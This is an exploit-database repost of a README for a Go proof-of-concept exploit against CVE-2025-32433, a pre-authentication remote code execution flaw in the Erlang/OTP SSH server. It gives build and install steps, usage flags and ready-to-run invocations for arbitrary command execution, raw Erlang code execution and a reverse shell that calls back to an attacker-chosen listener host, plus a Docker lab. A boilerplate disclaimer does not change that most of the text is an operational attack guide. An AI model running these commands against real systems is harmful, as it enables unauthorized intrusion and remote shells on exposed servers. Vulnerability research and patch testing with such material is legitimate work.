Share
## https://sploitus.com/exploit?id=C78DF89D-6017-51DA-A1CF-750A450D0B2E
Erlang/OTP SSH Unauthenticated Blind RCE (CVE-2025-32433) PoC


    
    
      
    


## ๐Ÿ“œ Description
CVE-2025-32433 is a critical unauthenticated remote code execution vulnerability in Erlang/OTP's SSH server. Prior to the patched versions, the SSH daemon incorrectly processes channel messages before authentication is complete, allowing an attacker to open a channel and send `exec` requests without ever providing credentials. Any application embedding Erlang/OTP's SSH server (including Elixir, RabbitMQ, CouchDB, and others) is affected when the SSH port is exposed.

This Go PoC connects to a target SSH port, sends a crafted `SSH_MSG_CHANNEL_OPEN` followed by a `SSH_MSG_CHANNEL_REQUEST` exec payload โ€” entirely pre-authentication โ€” causing the remote Erlang node to execute arbitrary OS commands. Execution is **blind**: no command output is returned to the attacker.

**Affected versions:** Erlang/OTP  [!NOTE]
> Requires [Go 1.21+](https://go.dev/dl/). No external dependencies โ€” uses only the Go standard library.


### OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433 cve-2025-32433.go
```

### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433.exe cve-2025-32433.go
```

### Install directly with Go
```bash
go install github.com/joshuavanderpoll/CVE-2025-32433@latest
```

### Run without installing
```bash
go run github.com/joshuavanderpoll/CVE-2025-32433@latest -host 192.168.1.100 -port 22
```

## โš™๏ธ Usage
```
Usage of ./cve-2025-32433:
  -host string
        Target IP or hostname
  -port int
        SSH port (default: 22) (default 22)
  -timeout int
        Connection timeout in seconds (default: 5) (default 5)
  -command string
        Shell command to run on the target (wrapped in os:cmd)
  -code string
        Raw Erlang expression to execute on the target
  -shell
        Send an Erlang-native gen_tcp reverse shell
  -lhost string
        Listener IP for reverse shell (required with -shell)
  -lport int
        Listener port for reverse shell (default: 4444)
```

### Check if a target is vulnerable
```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222
```
![Command execution Example](/assets/vulnerability-check.jpg)

### Command execution
```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222 -command 'whoami > /tmp/out2.txt'
```
![Command execution Example](/assets/command-execution.jpg)

### Reverse shell
The `-shell` flag sends a native Erlang `gen_tcp` reverse shell payload โ€” no bash or `/dev/tcp` required. Start a listener first, then send the exploit.
```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222 -shell -lhost host.docker.internal -lport 4444 
```
![Code execution Example](/assets/reverse-shell.jpg)

### Code execution
The `-code` flag sends a raw Erlang expression directly โ€” no `bash -c` wrapper. Useful for pure Erlang ops or when bash isn't available on the target. Since execution is blind, write output to a file and retrieve it separately.

```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222 -code 'file:write_file("/tmp/out.txt", os:cmd("id")).'
```
![Code execution Example](/assets/command-execution.jpg)

## ๐Ÿ‹ Docker PoC
More details at [docker/DOCKER.md](/docker/DOCKER.md)

```bash
cd docker/
docker compose down
docker compose up -d
# You can test at -host 127.0.0.1 -port 2222
```

## ๐Ÿ•ต๐Ÿผ References
- [Erlang/OTP Security Advisory](https://www.erlang.org/news/175)
- [NVD โ€” CVE-2025-32433](https://nvd.nist.gov/vuln/detail/CVE-2025-32433)
- [HackIndex](https://hackindex.io/vulnerabilities/CVE-2025-32433)

## ๐Ÿ“ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.